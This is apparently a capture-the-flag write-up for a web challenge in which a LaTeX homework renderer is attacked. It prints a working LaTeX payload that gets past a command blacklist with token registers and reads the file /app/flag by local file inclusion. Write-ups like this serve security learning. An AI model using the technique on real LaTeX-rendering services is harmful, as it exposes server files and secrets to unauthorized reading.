--- title: "Homework Render | Challenge" tags: ctf writeup --- Homework Render - web === ## Description Isn't writing math homework hard? We have created an easy-to-use homework submission portal that allows you to type up your homework. We don't think anyone can get into this server for free answers! Author: `ap` Connection Info: :::info https://hw-render.chall.lol ::: ## Exploit  In this challenge, we are given a website that can render LaTeX files as shown in the image above. It is known that LaTeX can be exploited to perform LFI (Local File Inclusion) by using commands like "input" to include a file in the LaTeX document. However, the website has a blacklist of certain text that cannot be used to call LaTeX commands. After some trial and error using LaTeX commands, I discovered that we can use the following LaTeX code to gain local file inclusion and read the flag at */app/flag*: ```latex \documentclass{article} \RequirePackage{verbatim} \begin{document} \newtoks\in \newtoks\put \in={in} \put={put} \begin{verbatim\the\in\the\put}{/app/flag}\end{verbatim\the\in\the\put} \end{document} ``` In the exploit above, we use *\RequirePackage* instead of *\usepackage* to import a package. We then use *\newtoks* to create new variables *in* and *put*. Finally, we use *\begin* and *\end* to call a string as a command, allowing us to use *\verbatiminput* to read the contents of */app/flag*. After submitting the LaTeX code, the flag we obtain is shown below: